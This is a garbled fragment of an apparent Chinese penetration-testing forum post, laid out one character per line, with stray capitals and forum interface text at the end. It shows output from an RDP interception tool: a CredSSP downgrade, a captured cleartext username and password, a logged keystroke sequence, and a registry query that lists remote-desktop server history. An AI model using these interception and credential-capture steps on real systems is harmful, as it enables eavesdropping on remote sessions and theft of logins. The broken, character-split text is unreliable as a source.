,
D
o
w
n
G
r
a
d
i
n
G
C
r
e
d
S
S
P
C
o
n
n
e
c
t
i
o
n
l
o
s
t
C
o
n
n
e
c
t
i
o
n
r
e
c
e
i
v
e
d
f
r
o
m
1
9
2
.
1
6
8
.
5
7
.
1
0
3
:
5
0
4
0
9
L
i
s
t
e
n
i
n
G
f
o
r
n
e
w
c
o
n
n
e
c
t
i
o
n
E
n
a
b
l
e
S
S
L
C
o
n
n
e
c
t
i
o
n
l
o
s
t
C
o
n
n
e
c
t
i
o
n
r
e
c
e
i
v
e
d
f
r
o
m
1
9
2
.
1
6
8
.
5
7
.
1
0
3
:
5
0
4
1
0
L
i
s
t
e
n
i
n
G
f
o
r
n
e
w
c
o
n
n
e
c
t
i
o
n
E
n
a
b
l
e
S
S
L
H
i
d
i
n
G
f
o
r
G
e
d
p
r
o
t
o
c
o
l
r
e
q
u
e
s
t
f
r
o
m
c
l
i
e
n
t
.
a
l
i
c
e
:
i
l
o
v
e
b
o
b
K
e
y
b
o
a
r
d
L
a
y
o
u
t
:
0
x
4
0
9
(
E
n
G
l
i
s
h
_
U
n
i
t
e
d
_
S
t
a
t
e
s
)
K
e
y
p
r
e
s
s
:
L
S
h
i
f
t
K
e
y
p
r
e
s
s
:
S
K
e
y
r
e
l
e
a
s
e
:
S
K
e
y
r
e
l
e
a
s
e
:
L
S
h
i
f
t
K
e
y
p
r
e
s
s
:
E
K
e
y
r
e
l
e
a
s
e
:
E
K
e
y
p
r
e
s
s
:
C
K
e
y
r
e
l
e
a
s
e
:
C
K
e
y
p
r
e
s
s
:
R
K
e
y
r
e
l
e
a
s
e
:
R
K
e
y
p
r
e
s
s
:
E
K
e
y
r
e
l
e
a
s
e
:
E
K
e
y
p
r
e
s
s
:
T
K
e
y
r
e
l
e
a
s
e
:
T
C
o
n
n
e
c
t
i
o
n
l
o
s
t
[
*
]
C
l
e
a
n
i
n
G
u
p
.
.
.
[
*
]
D
o
n
e
.
H
K
E
Y
_
C
U
R
R
E
N
T
_
U
S
E
R
S
o
f
t
w
a
r
e
M
i
c
r
o
s
o
f
t
T
e
r
m
i
n
a
l
S
e
r
v
e
r
C
l
i
e
n
t
S
e
r
v
e
r
s
U
s
e
r
n
a
m
e
H
i
n
t
d
i
r
"
R
e
g
i
s
t
r
y
:
:
H
K
E
Y
_
C
U
R
R
E
N
T
_
U
S
E
R
S
o
f
t
w
a
r
e
M
i
c
r
o
s
o
f
t
T
e
r
m
i
n
a
l
S
e
r
v
e
r
C
l
i
e
n
t
S
e
r
v
e
r
s
"
-
N
a
m
e
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
渗透测试